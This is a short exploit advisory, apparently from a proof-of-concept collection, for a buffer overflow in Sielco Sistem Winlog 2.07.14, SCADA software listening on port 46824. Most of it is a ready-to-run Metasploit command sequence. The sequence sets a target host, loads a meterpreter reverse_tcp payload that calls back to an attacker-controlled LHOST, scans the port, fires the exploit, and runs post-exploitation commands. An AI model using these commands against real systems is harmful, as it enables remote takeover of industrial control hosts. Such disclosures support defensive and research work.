Timeline :
Vulnerability discovered by m-1-k-3 the 2012-06-03
Public release of the vulnerability the 2012-06-04
Metasploit PoC provided the 2012-06-07
PoC provided by :
Reference(s) :
Affected version(s) :
Sielco Sistem Winlog before or equal to version 2.07.14
Tested on Windows XP Pro SP3 with :
Sielco Sistem Winlog 2.07.14
Description :
This module exploits a buffer overflow in Sielco Sistem Winlog before or equal to version 2.07.14. When sending a specially formatted packet to the Runtime.exe service on port 46824, an attacker may be able to execute arbitrary code.
Commands :
use exploit/windows/scada/winlog_runtime_2 set RHOST 192.168.178.22 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 nmap -p 46824 192.168.178.22 exploit getuid sysinfo